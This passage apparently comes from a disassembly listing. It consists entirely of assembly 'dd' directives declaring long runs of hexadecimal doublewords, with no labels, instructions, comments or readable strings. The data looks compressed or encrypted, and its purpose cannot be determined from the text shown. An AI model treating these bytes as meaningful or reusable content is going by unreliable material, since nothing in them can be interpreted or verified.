		dd 0C3651B69h, 9AAB1081h, 0EF0551FFh, 0E54414DAh, 0E421DF30h
		dd 38452E3Fh, 0E604934Bh, 5147722Dh, 1F7B45CFh,	0F0D864F3h
		dd 14754D16h, 5E019295h, 10298389h, 61204D63h, 0EE91B15Fh
		dd 0D6629DF0h, 3FFD92D3h, 8B00C2F1h, 130A1741h,	98C5CC6Ch
		dd 0EB5E3B53h, 4540D70Dh, 5068D14Dh, 144A2D5Dh,	0CAF298BFh
		dd 0F0A6B36Ah, 5D062DFFh, 5853AC19h, 0B0122D6h,	0DB70BFACh
		dd 0A06ADAC9h, 0EDBAD123h, 1F06C240h, 8CB199CCh, 0F0B00939h
		dd 4F5DE743h, 8B8D76ABh, 0B9D9198Dh, 5AE245D9h,	16B9150Ch
		dd 0A545468Dh, 86D71880h, 0A28DDA09h, 46898045h, 0AD209828h
		dd 0E337DE62h, 17724CADh, 96946346h, 0E5E338E0h, 3BD80812h
		dd 0ACAEB2EFh, 836A620Eh, 88DA10C7h, 0B53DFBE8h, 647EB075h
		dd 7E21714Fh, 0DBB437D6h, 2B1C52E9h, 79D76621h,	576F2520h
		dd 0C2923851h, 5CCB2454h, 8EB8E9C0h, 7A44C551h,	9AC1EB9Ch
		dd 0F8FC14BBh, 0EA9A8255h, 0D6881D60h, 0D356B84Bh, 0AD3323BAh
		dd 0C2873C01h, 0A80DE01Ah, 0BC84712Dh, 52446377h, 0E4EFB56Eh
		dd 0C0680DC6h, 3D0E0311h, 5B3C1920h, 0A02267E4h, 8762095Ah
		dd 7772D63h, 0C380F7BDh, 3806ADE9h, 7825A6FAh, 61C5A63Ch
		dd 26344186h, 125E82A4h, 700D9479h, 0A98F0BF1h,	390C2096h
		dd 8453B40Eh, 0E00212D5h, 54127E90h, 743DF02Ah,	0A4166844h
		dd 0E4ED0C2Eh, 5F6FF948h, 9FC68B36h, 0C2457118h, 0A8293C16h
		dd 1C76941Dh, 1F9B874Fh, 134B287Dh, 0A044A6Ah, 0CE42FD16h
		dd 7C770D68h, 68E15CF4h, 0B9157A55h, 661C87E8h,	51AC53C9h
		dd 38E852B5h, 9F9ABF7Eh, 9BCEC0Fh, 0EEEA9576h, 0E55680Ah
		dd 4A421508h, 0D6A84F33h, 0B33EB0F4h, 33189FFh,	28E96518h
		dd 131A2A2Eh, 0F101CE75h, 0D62A943Dh, 79D923B7h, 9248A689h
		dd 0C6981029h, 845AE545h, 0BA775766h, 1E51CC0Fh, 0C4AD28B1h
		dd 0A7182028h, 0A8D55455h, 0A98E5B9Fh, 8340B08Ah, 800B4AACh
		dd 0E0EECCB0h, 3A76B2DDh, 0D074E557h, 303C8CAAh, 9381B5DFh
		dd 60583195h, 0FC7DF7BAh, 293DC6BBh, 9DC40831h,	0AAD013C7h
		dd 0D0628820h, 2AB43A84h, 5395FAA6h, 0CBF51641h, 0C96A59FFh
		dd 2B63D02Fh, 21D4C018h, 0A28A9506h, 0C388A9DAh, 1D034EC8h
		dd 4BAE1E27h, 2824E668h, 19A993B5h, 3B8D82E0h, 3DF7467Fh
		dd 0DCA77593h, 0B462C79Dh, 0AB278112h, 0E1CAB7AAh, 8FDB53FDh
		dd 317352F1h, 1C23C962h, 62D78FE8h, 1E4C1A3Ah, 3982C785h
		dd 3234959Dh, 0D047688Ah, 0C8B931F1h, 4F7C3562h, 0E92BAB35h
		dd 4D22DBECh, 0E3A728B9h, 0EFE6F782h, 0FC7497A4h, 66FD5ABBh
		dd 251EF28Ch, 209718C4h, 1A0A9CD6h, 0E1A0484Fh,	264E2FC2h
		dd 344E6777h, 69A9ECEh,	5BCEA782h, 3AB2771Dh, 732EA115h
		dd 1795B87Ch, 0BDBDF320h, 0EE2FDDE1h, 0EA48E62h, 28E6126Ch
		dd 0E0525142h, 0D95935DDh, 0AF90B847h, 17888F04h, 5864396Dh
		dd 3E10B509h, 59E5013h
		dd 69C217CDh, 79364C94h, 1DA13F51h, 57C29939h, 27B43C5h
		dd 0EA09ED94h, 0C2A9083Ch, 40A8D87Dh, 0E8509645h, 0FD65AE2Eh
		dd 7C74197Ah, 864CDF60h, 0FDB6B216h, 0E1E3FED0h, 0F68B1268h
		dd 96DF542Ah, 0BCEE0F0h, 2F3EAB87h, 4B0873DAh, 19B3E1B7h
		dd 3419BE73h, 0D536BC90h, 0FD9CB245h, 501114Fh,	4D55AF3Ah
		dd 0A2244560h, 70AFEBD9h, 9304CEEEh, 8811F516h,	71FB00D1h
		dd 48C3B606h, 0AB949A96h, 165852A8h, 66D52254h,	0E443E8E3h
		dd 9C2693C4h, 5226D106h, 0DAEB07A5h, 512DEC2Fh,	2D091260h
		dd 0F26F1AC8h, 6EA2EE5Eh, 6DB41812h, 0DA544F79h, 0F0B55CAh
		dd 549008B4h, 7D70A41Dh, 232A8284h, 0CB6846CFh,	0E0C4ADC2h
		dd 3FFD54F6h, 4373B648h, 2DD9768Ch, 357D9C60h, 60388116h
		dd 0E54E8397h, 677EDDB7h, 24C7380h, 0BB3A0546h,	7BEF5ADFh
		dd 789C3945h, 0A157FE63h, 5AB89E4h, 2103554h, 1287A877h
		dd 0EE272ECBh, 5A28E3B0h, 0E68D2A6Eh, 6CC44FBFh, 93F03B60h
		dd 78BD6526h, 0FE311DBEh, 175E767Fh, 0FE8E8532h, 1174556Fh
		dd 0C5B8540Ch, 0B4328B9Ch, 7BB92D32h, 0A1946355h, 0BB0F4545h
		dd 5AD47AD0h, 307C2A1h,	91A0EBAFh, 34C3BC62h, 0E5B82EF9h
		dd 2638A38Bh, 181DDF95h, 8DFF8636h, 8CCA4678h, 44F41EC3h
		dd 0FE2412DFh, 0AB8A543Fh, 0CD01CF6Ch, 25EA53E2h, 5CB0076Dh
		dd 0C96881F5h, 82FB373h, 598C5725h, 5521B3D9h, 0B87214B4h
		dd 79590138h, 97021186h, 69EC88DAh, 82104808h, 44AE4AB5h
		dd 33128D34h, 625BAB11h, 1AA1A957h, 0D572A302h,	0A24A2556h
		dd 0BB4C0368h, 55CF0082h, 2D96D641h, 5A01A1B0h,	102E449Dh
		dd 5E231E26h, 0D8C36C67h, 3408940Ah, 0C4419C2Bh, 59538A27h
		dd 1AA75787h, 0B044A348h, 60816AF2h, 0B44180BDh, 0AE1CB2F6h
		dd 11C02A9Ah, 238F4808h, 0B57571B2h, 8A40007Dh,	988E2E54h
		dd 661B5A76h, 533E2EFAh, 0D1F6495Ah, 0A63F96E7h, 3C12FFF9h
		dd 69FA1557h, 0FB6EEB03h, 546657FAh, 0B5C008EAh, 0EE4DD505h
		dd 6417536Ah, 96542998h, 52402788h, 2DBB9900h, 78E1B705h
		dd 0E7793603h, 9C67842Ah, 23066C52h, 0E9401DF4h, 37D953BAh
		dd 0F86266E1h, 92AB8542h, 5144BD2Eh, 8F444750h,	0E041DAAAh
		dd 0AD171B4Bh, 0F5B2E078h, 7AC08Dh, 82B2687Ch, 0E4BA16Ah
		dd 87617E31h, 7B68DE83h, 88486B1Dh, 19B32D10h, 621238CCh
		dd 959652D0h, 29EBD203h, 2781167Ah, 315090DAh, 96305D05h
		dd 4BEA608Ch, 3AA6F9B3h, 88095C8h, 66D5BDA9h, 7045AAD5h
		dd 3BC705D8h, 238A87A4h, 0D7F08346h, 0B54265A6h, 6EF3A9A5h
		dd 9504F6AFh, 0E55E3849h, 5490EA96h, 7555E607h,	0C6AF2994h
		dd 6D28A385h, 0A5AAA962h, 0A3B6495Dh, 12B9AEEFh, 88229C2Fh
		dd 1EABFD92h, 9067D842h, 0DB7DBC23h, 0BD1555AEh, 6C027889h
		dd 0E693A2AFh, 5D80AE2Ah, 8E967F03h, 86329464h,	0E283C194h
		dd 11386869h, 65C68ECh,	0D3A391A6h, 0CB558AC0h,	72B08691h
		dd 6698FC1Ah, 590624E2h, 54573372h, 79E356E7h, 199882F4h
		dd 0A305204Fh, 3313F18Ah, 417E0968h, 5892718Ah,	0F2ED78BFh
		dd 43CB746h, 0D68A2BA9h, 4E090C2Ah, 0A4E891C3h,	0BA2A28EDh
		dd 8A15AE82h, 172C914Eh, 59844E46h, 36F758Fh, 10453A29h
		dd 981D99A4h, 4D1540EDh, 6D34A4Dh, 0B9A31610h, 7827942h
		dd 39181046h, 6315AA05h, 37D981A2h, 35A069E9h, 24C4857Fh
		dd 0CE3397B2h, 3E2A928Bh, 4C4BCC49h, 6DCFED40h,	5456F5Dh
		dd 63554949h, 46970D27h, 8B9D9EBh, 0A57C9174h, 0A993710Ch
		dd 5832781Ah, 22EE9946h, 0A2A75105h, 0EC15F35Ah, 0E623E80Bh
		dd 2E478D86h, 7C8A5D62h, 0EE54CA3h, 0F7306FA4h,	108BDD66h
		dd 0A02688CAh, 0FC523E20h, 5AA75759h, 55C4C88Fh, 696A0CF5h
		dd 91A14E4Ah, 2C9380AFh, 15C415C2h, 0A2B5D385h,	1322AE30h
		dd 4F09A311h, 8A55AC76h, 876B6B38h, 595B077Dh, 31653905h
		dd 0DF51C70Fh, 0DDDE4CCCh, 6841B306h, 67E05431h, 8520169Eh
		dd 0E91F0167h, 68669412h, 388E60E5h, 223BAD1Bh,	516603E6h
		dd 38F2071h, 23980953h,	54546D0h, 52DAD7F2h, 0B9C04DB4h
		dd 62FD4BA2h, 0FEF4A14Dh, 0CEFA6326h, 8018B382h, 0D5FD4DC2h
		dd 91A7070Fh, 0B174A37Eh, 8A337D26h, 7331E150h,	7195BBCDh
		dd 0E9063B15h, 2AE901AAh, 0C78B9C82h, 3D57C2B1h, 7677A0A4h
		dd 0BE522E8Ch, 0FBF89BA7h, 0E0E567A1h, 0B7212CC2h, 6C620F17h
		dd 25ACBA2Dh, 0E21176E7h, 158CD73Ch, 825E2E34h,	85D74480h
		dd 17B3AF00h, 0B818EABEh, 501602E2h, 69077010h,	23C5BF5Ah
		dd 16B445C6h, 0FD7FFA50h, 5FC9899Fh, 0C9B526E6h, 8EDD465Fh
		dd 57FF62Ah, 7A0E3F5Dh,	0B26F25DDh, 76A58CBAh, 1D72FE4h
		dd 1A5A6D30h, 222876C2h, 77E7FF9Ah, 2C82990Fh, 4318CA1Fh
		dd 8883167Dh, 0B33C6070h, 1D762413h, 0E9D39256h, 21F581Ah
		dd 9B0B79h, 7D980ECFh, 0B1FF1717h, 8BC4D8ADh, 0D13C3E69h
		dd 63D732DFh, 0FB2EF7Ah, 0B8619DFFh, 0C5752698h, 5F594C0Fh
		dd 45822A4h, 1D26A33Ah,	6303C543h, 7615409h, 8160D303h
		dd 0F08133B4h, 0B85426FBh, 0C0096AEBh, 0C5371188h, 65B43A5Ah
		dd 81E6B1E9h, 0B10C98CDh, 0D63E10CCh, 0DB89314Ah, 0A408E0B8h
		dd 9AC04125h, 1143DDA2h, 54F2DB7Bh, 898212B4h, 0E0AE2295h
		dd 307D284Fh, 609CA4A4h, 44F3E622h, 12983E1Dh, 7BC8508Ah
		dd 89C3273Fh, 0CB84ABCDh, 5FEC6123h, 0B5D6BD82h, 3305E22Dh
		dd 4632978h, 400C0D82h,	60F878ADh, 0ECFCB05Dh, 11461080h
		dd 0BFA2286h, 3FB74937h, 84BC48CCh, 107BCBC8h, 80A3E523h
		dd 0B88C6413h, 8D59F89Dh, 18324C58h, 0F07BCE1Bh, 0E5215314h
		dd 3184306Bh, 46E01CE2h, 0C47AA9C4h, 0DE512690h, 3879F0C1h
		dd 0A3A63F6Ch, 0A03038FDh, 7611A11Ch, 6B216ABBh, 0E11A4583h
		dd 0F8FA8392h, 8E0AE48Fh, 154F2EFDh, 0E6CAEF6Fh, 80E95CBBh
		dd 35D24DE5h, 8E559046h, 5944B18h, 9804AD14h, 7AD7937Dh
		dd 5D8B25Eh, 0B2BC1E0Ah, 0C44C858Ah, 5D90E34h, 28C2A238h
		dd 1C020607h, 75812691h, 899CE824h, 0BA18C240h,	28444700h
		dd 805DC0E5h, 72A2D023h, 0D4231460h, 786041D2h,	226B805Dh
		dd 2EC072A6h, 551111C0h, 0E0173039h, 1CBB3608h,	0B7086218h
		dd 75189064h, 89BE017h,	0BBB1CBCh, 5BC44470h, 0E0178C0Eh
		dd 0CC0E42C8h, 4E026723h, 0DA461C44h, 41F43805h, 0E017072Dh
		dd 0CF42B888h, 341B7401h, 79C1AC71h, 0FF5046ACh, 238053F8h
		dd 24C250EAh, 0FF835D20h, 1C023104h, 3948F31h, 0A08EE943h
		dd 0C01C4113h, 0DA110174h, 4E6D497h, 46858922h,	0D042810h
		dd 56AD3A77h, 0D45A2BA4h, 0DA938B98h, 717C5B69h, 0B6BD7A56h
		dd 0D16FEBAFh, 5E1CFF3Ah, 0F0DF02E0h, 126344ACh, 41338B16h
		dd 98C448A6h, 3871188Ah, 0E3C978EAh, 689A3189h,	0B2377D62h
		dd 0A13A78D8h, 1DD204Ch, 2248458h, 0F7F1h, 0D0004000h
		dd 0E0000001h, 434A0041h, 6000h, 0
		dd 20E0B3F4h, 423DDAC0h, 86C6708h, 4A650847h, 0B6945230h
		dd 3D481073h, 66002047h, 0E343231Ch, 0EB01060Fh, 120A1F59h
		dd 3A161D48h, 107AA8E8h, 46E3E021h, 0BEE8038Fh,	3C043A35h
		dd 30BCD2h, 0C182652Fh,	4001BD75h, 2030EDEFh, 8183F779h
		dd 20AA735h, 2BEA1C3Bh,	0D8384EE3h, 0C02124CBh,	8187DEDEh
		dd 857A4285h, 2670841Ah, 2E021DACh, 601875F2h, 602110F0h
		dd 85871E8Ah, 410FAB8h,	874B468h, 4176885Bh, 40C77D88h
		dd 9083FEDh, 8FEEC08h, 275E6431h, 0DC8101DFh, 8184E374h
		dd 860BCA87h, 77601C15h, 0CC80207Ch, 36402197h,	0BBB5250Dh
		dd 43805004h, 3D16FFFFh, 96E7F807h, 16C0A8DFh, 3020EE5Fh
		dd 0C1422975h, 10BD408h, 102CE3E3h, 65A5080Eh, 2D096688h
		dd 0C23D660h, 10AF4510h, 0D478C103h, 0F119010Dh, 6058C6B8h
		dd 863B480h, 211B9982h,	4302477h, 0BCC020CEh, 0EA10E4F6h
		dd 50C1D680h, 430F2443h, 3511040Fh, 0EEC85C3Eh,	0F4C030BEh
		dd 0E2818608h, 86C70C86h, 93960214h, 5AF83864h,	63A041DFh
		dd 0A1A12FEAh, 219A9221h, 0ED9D21ECh, 9EA1D0B4h, 2197121Fh
		dd 86350D47h, 0A7A911D0h, 0F244423Ah, 283C1882h, 14FD7810h
		dd 4882463Eh, 1C8465B0h, 0E030C37Bh, 40834754h,	40E5040h
		dd 0E878A84Dh, 3CA87372h, 0E866B754h, 351C1A44h, 3600901h
		dd 1181250h, 34A08941h,	48B00B92h, 8E30604Fh, 77A0213Eh
		dd 0D28806EFh, 0A00217CBh, 0FA175F70h, 2075BFA0h, 20521028h
		dd 19BB6511h, 1A3E9481h, 290B1C50h, 601183A5h, 84A1294h
		dd 29285A50h, 0C4A1A943h, 9287A510h, 4A229449h,	289A5144h
		dd 0A2A94592h, 8BA5184Ah, 32946928h, 0DA51C4A3h, 0A9479A91h
		dd 0EEDF3E82h, 0A4000231h, 5E821314h, 0A9A95A52h, 0C2A5A14Bh
		dd 7A97652Fh, 0AA511E8Ah, 12D4A929h, 5952C0A5h,	8F4B5697h
		dd 1D26014Ah, 24CE8047h, 8753010Ah, 56190F7Eh, 0B90FCFF5h
		dd 3BB72ACh, 40D0A8D0h,	587EF0CCh, 2196B61Ch, 0E006B158h
		dd 6C920296h, 0C256FB19h, 6BA5A4B5h, 0B8100DC8h, 0A8446871h
		dd 903932h, 1090018h, 0F152DB80h, 8F424206h, 1EC4EC84h
		dd 810F34ADh, 32E774B9h, 5A6DD679h, 17B7922h, 0A2280484h
		dd 40D2EC27h, 85854186h, 2B85BCD1h, 8167F006h, 8DEE64CBh
		dd 554B5ACh, 9DBEEE52h,	4165BC58h, 0CA5C19DCh, 23F4081Ch
		dd 4CD5A714h, 0F84FD821h, 2670460Ah, 18211807h,	4FFC1C8Ah
		dd 3A602C77h, 3B6F8202h, 0C23C4158h, 0E124105Ch, 9C65845Ah
		dd 0FC381580h, 1180C0A0h, 70482C1Ah, 0F0884C2h,	0A170C86Ch
		dd 3A1F1088h, 0C4A27148h, 0AC5A2F18h, 8CC6A371h, 0C8EC7A3Fh
		dd 2090C8A4h, 72492C9Ah, 4F2894CAh, 0A572C96Ch,	0BA5F3098h
		dd 0CCA67349h, 0ACDA6F38h, 9CCEA773h, 0C9ECFA7Fh, 40A0D0A8h
		dd 744A2D1Ah, 8F48A4D2h, 0A974CA6Dh, 3A9F50A8h,	0D4AA754Ah
		dd 0AD5AAF58h, 0ACD6AB75h, 0CAED7ABFh, 60B0D8ACh, 764B2D9Ah
		dd 0CF68B4DAh, 0AD76CB6Bh, 7B170B8Dh, 0C941A2EBh, 76BBDE2Fh
		dd 37ABDDF2h, 0FB7EBF91h, 9EB45D45h, 0B758EDE1h, 29502AA1h
		dd 89742F72h, 41A5D16h,	0A54E294Ch, 99CCA5D4h, 42C494E4h
		dd 6B2B1039h, 46B65CCAh, 19364808h, 0AA65EE95h,	651C0BA8h
		dd 19D1D1EAh, 0A9A681Eh, 52851C82h, 37553580h, 994B850h
		dd 0D6E3E0D8h, 716F8428h, 0E2AD1050h, 68020270h, 23104A28h
		dd 2415126h, 0B3023500h, 0A7904E0Ch, 0D6141808h, 0CDE604AAh
		dd 0E69465A4h, 48EA216h, 0B05A0980h, 28125E2Eh,	4C01610h
		dd 112E2005h, 89245002h, 40F96402h, 0DF72A2DEh,	14F72A05h
		dd 0DA0CB2DCh, 0C90205B4h, 0A990486Bh, 25D641Eh, 8226D499h
		dd 27A24555h, 0AA51A5B3h, 8608A633h, 6A651414h,	0E9D49A1Dh
		dd 3E880597h, 2BAB7496h, 9B6D9562h, 0D08413h, 72B486C2h
		dd 90AA5329h, 0F5324C24h, 1F113B4h, 9A751D1Eh, 5090A7D3h
		dd 682098C2h, 59529B4Ch, 14A90092h, 82B33161h, 0B812B65Ah
		dd 56DF63B6h, 831732B6h, 0D2B6416Ch, 2A0C3745h,	1383B702h
		dd 0AB5D8B5Dh, 0E03066Dh, 0B94326h, 0CF881996h,	23961277h
		dd 9326149Ch, 85414812h, 0E96C3B2Eh, 85540B1Ah,	10407004h
		dd 80903258h, 0A065B2F7h, 49C5C09Dh, 0D40F02F0h, 1A4282DAh
		dd 5ACCD7B1h, 76F98444h, 0B4D849Ch, 0B9ABB1A8h,	309212D9h
		dd 505A1DCh, 0BA8B8D35h, 0B64A60C2h, 0B51D666Ch, 0A2DA31B6h
		dd 91581D00h, 64396268h, 10D592EAh, 0E2AA1412h,	0DBB59589h
		dd 80407180h, 71C8BD0Bh, 0FC2AA818h, 40A16469h,	34B28749h
		dd 3B15D6CEh, 8252F36h,	0F0EC6ACDh, 25C7A923h, 9815AD40h
		dd 15020054h, 0B5D945E5h, 0B3D2E41Ah, 8B100091h, 6FB30BC3h
		dd 0C2C0DB28h, 5534A24Bh, 506A62D2h, 0A000A141h, 28979C31h
		dd 7294B4F8h, 0A148644Ah, 9AA32C2Dh, 2AE1A73Eh,	0CBA83637h
		dd 0EC01A0EFh, 44128A6Dh, 86D2DF98h, 0DF093244h, 0B75BC672h
		dd 0CA028D3Eh, 5A14362Eh, 0A270714h, 2F67A222h,	0AA18ECA1h
		dd 869314F9h, 0BF16B2A9h, 7B952AA2h, 8E18068Dh,	6B0760A8h
		dd 4B941077h, 1A714268h, 8254D408h, 0CC396462h,	0A653844h
		dd 6FB2C362h, 0B6595A0Fh, 0E6820501h, 0ABB028A6h, 0EDC9BD77h
		dd 0B49452E3h, 0E638C289h, 0ACA2B964h, 6387E9AAh, 25C2EADFh
		dd 0D5DAD25Ah, 0E8642214h, 0A1714CA4h, 0A70A29Ah, 3303B57Ch
		dd 2B0D396Ch, 4BD42980h, 75B746E3h, 4660698Ch, 0E5BE3C27h
		dd 7030754Eh, 0C6280836h, 4283A075h, 8B3A7098h,	23812963h
		dd 134B2283h, 4CE563C1h, 25374FADh, 0AB3BC3B1h,	68B90561h
		dd 0D58192D6h, 0C61A2831h, 0B8C6B136h, 0B80985E9h, 453CF1CFh
		dd 5F8232E3h, 7558001Ah, 65B9AA93h, 9CB8D930h, 262CD21Ch
		dd 5AF059D6h, 53C116EFh, 81D09DCDh, 4414BB95h, 73CD771Bh
		dd 1225394Dh, 604452DAh, 0ACB6810h, 5D02E42Ch, 0A709AC64h
		dd 0A59EEA14h, 0D7365869h, 922599ECh, 52E8B8E6h, 0C030683Bh
		dd 0DED796BAh, 6004A6B5h, 90308A57h, 166058ABh,	1B6DE6A1h
		dd 0CAC92810h, 0B531EED6h, 0A28505Ch, 0CB80108Ch, 0F2E01796h
		dd 7054B6B9h, 0B0042DD5h, 72C9A7C3h, 82C67515h,	49F49085h
		dd 0C54189C9h, 0D48171FFh, 4F85FD82h, 2FFA6781h, 842902E5h
		dd 42A00683h, 8950A1E0h, 109532Ch, 309CAF95h, 26E2023Fh
		dd 1B050B45h, 0D4B1B59h, 0F9FE3851h, 0FB769602h, 0C1160548h
		dd 0E0B11525h, 4B991276h, 902051C8h, 0B2598359h, 403892E1h
		dd 4A14969h, 36085610h,	96005599h, 698CC1A8h, 3C9FD843h
		dd 0D8248418h, 143B2CEh, 2414618h, 2454462Eh, 0E4705B9Ah
		dd 28102F7h, 0C19ADBAFh, 5C33A164h, 0BD68F300h,	0AAAA4818h
		dd 0B69422Ch, 7515EA42h, 0F410C05Ah, 98445E88h,	26D8147Ah
		dd 28BF441h, 1EC123D0h,	245FA209h, 0D2058095h, 0DDAD09EAh
		dd 901602C2h, 48BF2C05h, 0B1F602C8h, 122FCB01h,	38C05FA3h
		dd 805FC015h, 14498394h, 2A8F4058h, 5D6630Dh, 204C04EFh
		dd 8030968h, 4954674Ch,	6070583h, 0C26170D8h, 7C462715h
		dd 8BC66371h, 0D8FC8647h, 2593CA65h, 72D97CC6h,	67359BCEh
		dd 6773D9FDh, 68745A3h,	0D26974DAh, 7D46A755h, 0ABD66B75h
		dd 0DAFD86C7h, 65B3DA6Dh, 76DB7DC6h, 0E775BBDEh, 6F77DBFEh
		dd 70785C3h, 0E27178DCh, 7E472795h, 0CBE67379h,	0DCFE8747h
		dd 0A5D3EA75h, 7ADD7EC7h, 67B5DBEEh, 777BDDFFh,	787C5E3h
		dd 0F2797CDEh, 7F47B3D7h
		dd 9CDEFB7Dh, 0DEFF87C7h, 0E5F3FA7Dh, 7EDF7FC7h, 0E7F5FBFEh
		dd 7F7FDFF5h, 53255515h, 4A9D6553h, 25745003h, 77B3A8E8h
		dd 0D01BBD9Eh, 9EA900EEh, 8AE24FF3h, 103E2901h,	0EA99F9EAh
		dd 2F52094Eh, 0ADA48A5Ch, 0D79512C8h, 0B2C905h,	3522C04Dh
		dd 79005220h, 612F40A1h, 974644A8h, 1D428202h, 2AE6C0AAh
		dd 6C0AE69Ah, 11A75BEEh, 0CC18D4F5h, 50F802EAh,	9AF350C2h
		dd 0A941BAD9h, 0C9ACE201h, 528BDB0h, 44C082DDh,	6544A0DCh
		dd 2E4BDDA9h, 4DB099B1h, 0DA12A359h, 6C46AEAEh,	99994A33h
		dd 6E02F1A1h, 18216215h, 21321221h, 120E1BC8h, 89081079h
		dd 6904815h, 0BA5D4FD9h, 0B089D18h, 5F00AEA9h, 6804CB9Bh
		dd 0A557B29h, 0A1F460DAh, 0A97560A2h, 9B6FB702h, 3D4EEAC1h
		dd 10880790h, 71061051h, 4904111h, 0A4AA86AAh, 50EE4052h
		dd 0FD4054CDh, 0BF55A504h, 3C0DDC0Ch, 96A19B09h, 4BA0B8DAh
		dd 0DBE81A0Bh, 62E8102Bh, 0C73002C8h, 192DB70h,	37657CACh
		dd 29F62B50h, 6498A62Eh, 0D6F15B94h, 9C1CED8Ah,	0E1385E91h
		dd 690D0502h, 92F26DBDh, 43E605E2h, 0E0C3F040h,	509F31E6h
		dd 25283720h, 90BCC9D8h, 51C62FC5h, 786428ADh, 74552F27h
		dd 0ACAC8AF5h, 81569F45h, 52240886h, 0B51F9E3Ah, 0CEA31C5Ch
		dd 1E2C16D5h, 0E42675Fh, 980BB15Bh, 188B162Bh, 70BCAB81h
		dd 0BA5A4B34h, 0D4C92581h, 89231627h, 0E5B662A7h, 0C62CC650h
		dd 0D6B25E47h, 0C2DAD272h, 0A9779642h, 0EC4CCFC6h, 33240C48h
		dd 8AB592CCh, 3CD60396h, 830D26EAh, 316735CFh, 0B2820A8Dh
		dd 28F37078h, 0A1C2B328h, 2F29F21Ch, 70B87EF8h,	4B56044h
		dd 0ADD742C1h, 4902E6ABh, 790C9031h, 68C3DD6h, 58DC6F5h
		dd 15C074B9h, 98B3820Bh, 2130709Dh, 5988BB81h, 329B9D76h
		dd 0B32ADF08h, 0D0FB324Bh, 31238083h, 52AA12A4h, 8F951690h
		dd 2175B20h, 0F404A387h, 20D61319h, 5B0283CAh, 0CD20F28Eh
		dd 0B8A6C3Eh, 3146287Eh, 0ECA466CBh, 206B2BC1h,	0F9643373h
		dd 508DC51Dh, 43AB442Eh, 29E0ECA6h, 2A8A5C2h, 0A97350CEh
		dd 2671473Ch, 55A7E649h, 0C5A632CBh, 66B0AECEh,	72856F8Dh
		dd 0F3202Fh, 35EE30B2h,	0D60759F5h, 988072D3h, 472B7018h
		dd 0AE8E7016h, 0FB332241h, 1A48E099h, 29B5C0A5h, 6660C6AFh
		dd 2FD645F0h, 464C94Fh,	900A4F8h, 90084940h, 0C65E0232h
		dd 0D4A5694Ah, 92BE1242h, 4C490301h, 0A40237E4h, 0A5129425h
		dd 804219A0h, 200433C4h, 8AA52501h, 197A52D9h, 0F4A88866h
		dd 88801900h, 900A9D03h, 59503980h, 82E8D228h, 98C4525Ah
		dd 0A2908809h, 424EF603h, 4F04967Ch, 496D0516h,	0CC40A2AFh
		dd 925D2A4Bh, 65A6CE07h, 964031B9h, 38F51E40h, 18AE0051h
		dd 369A010Ah, 0F984379Ah, 59A8FE0h, 40306806h, 0BF37CC1h
		dd 880B1646h, 246B81A0h, 5E65C1D0h, 1C0FC021h, 5AEA3928h
		dd 7E06EAC7h, 0EE8246A0h, 23444A7h, 94B1290h, 25144A18h
		dd 9114BE9Fh, 0A4345E44h, 271F6423h, 894212F4h,	72FFFFDCh
		dd 0CFD4083Dh, 80E3E401h, 1D0040F8h, 87B802h, 3D84BA89h
		dd 7412E625h, 0C04B7896h, 0E12DA25Bh, 4B5896Ah,	12D225A0h
		dd 4B389661h, 2CA25904h, 0B1896212h, 0C225804Ah, 0F895E12Bh
		dd 0A25704ADh, 895A12B2h, 25604AB8h, 95612AA2h,	5504A989h
		dd 5212A225h, 384A5894h, 9128C244h, 52FA7E50h, 0F025C04Bh
		dd 4096012Bh, 25404A3h,	89114BB9h, 0F8437896h, 512BC256h
		dd 84AC8957h, 12A62528h, 4A409451h, 28225E8Eh, 3FFFFDAFh
		dd 0FB8A0808h, 0DE12A825h, 244A1097h, 93EC8701h, 2CA25684h
		dd 0A9855454h, 0C8360096h, 189E0574h, 4F221030h, 20278229h
		dd 14829277h, 348C2802h, 3F8524C0h, 9602A04Fh, 101F8349h
		dd 279C1AABh, 84841DDCh, 0D58D12C4h, 3DFF4A01h,	90986CB5h
		dd 0A1680080h, 4841283h, 0DE2E04AEh, 0E018EE68h, 68EF2C8Eh
		dd 0E66655DDh, 44B0D5DEh, 0A7747D8Bh, 58186AABh, 21725C8h
		dd 0D6A4AEDEh, 4B5058D0h, 0A62CB31Ch, 0B1BAC2D5h, 42DF70BAh
		dd 93053610h, 191C234Dh, 14954FC2h, 8472F019h, 155A9D16h
		dd 0A4EF7974h, 0ADF6C43Ah, 9AF6042Bh, 0EBF11837h, 96677BE5h
		dd 0EAE9425h, 89684AF3h, 6E01198Ah, 5302366Bh, 92E95D00h
		dd 2195D814h, 5A812D17h, 9B81B5BBh, 2B1D86C4h, 0E91B5B2Ch
		dd 8C413078h, 44B5C6E5h, 745D873Ah, 64900EDAh, 125D9320h
		dd 235D83C3h, 2AB6F3CBh, 0D602F5B8h, 0BD7C2F62h, 8BD982F6h
		dd 98BDB53Ah, 2E23A178h, 0E86C3A1Eh, 80317974h,	4B0032D8h
		dd 0E8B23A30h, 0E8CE3A3h, 70E8EB00h, 29795CC0h,	92ECF99Ch
		dd 0BF406A0h, 0A0DA603Fh, 0E4A8E669h, 373514F9h, 4350481Dh
		dd 1C22C080h, 704D7BEh,	11F600E0h, 0D6A1D3CEh, 13AAD524h
		dd 8466323Ah, 89AA0932h, 2043492Fh, 46229944h, 46A9831Bh
		dd 0F991F396h, 17973DEh, 0C3772306h, 56F50211h,	86109954h
		dd 24B6436Ch, 6806008h,	4C09CCA1h, 0A17520CBh, 84825A70h
		dd 0A03814A3h, 0D16A854Dh, 5C846145h, 909C9862h, 0D839979Fh
		dd 0A5F9BC63h, 0CD184345h, 3FF04929h, 0D549A4B0h, 0B4C94208h
		dd 0B4A2A750h, 2D2D0109h, 0A4A5871Ah, 0B07815E5h, 684C5F6Bh
		dd 94AE11A4h, 0BED3050Ch, 8C900CC9h, 0ABD05A30h, 0E2A4B80Ch
		dd 89357052h, 0D370B1C9h, 18310E01h, 0A594B58Ah, 0E4302F8Ah
		dd 89C8A7CCh, 0A97708B7h, 4E0312BCh, 56A8FBFBh,	7787101Ch
		dd 504AE98Ch, 57AE39C9h, 88E7FD11h, 957028Bh, 48B03342h
		dd 9EB81304h, 168BA281h, 84EA5E48h, 51080005h, 94390BA4h
		dd 4B418ABh, 330DC22Bh,	7C9C8058h, 795CA48h, 2F190101h
		dd 0E424B3E6h, 7276AFCEh, 0A989A593h, 0ACA7597Bh, 0F7A7A399h
		dd 40B1C1E5h, 0EC019FB7h, 6E0380A4h, 221582E0h,	7B572710h
		dd 0A4C686Bh, 80F8D480h, 262EC13Ch, 35CBF0E3h, 82257121h
